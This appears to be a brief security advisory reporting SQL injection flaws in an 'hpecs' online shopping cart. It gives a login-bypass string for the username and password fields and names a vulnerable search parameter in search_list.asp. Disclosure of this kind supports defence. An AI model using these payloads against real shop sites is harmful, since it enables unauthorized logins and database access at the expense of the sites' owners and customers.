vendor site:http://hpe.net/ product:hpecs shopping cart bug:injection sql risk:high login bypass : username: 'or''=' passwd: 'or''=' injection sql (post) : http://site.com/search_list.asp variables: Hpecs_Find=maingroup&searchstring='[sql] ( or just post your query in the search engine ... ) laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@xxxxxxxxx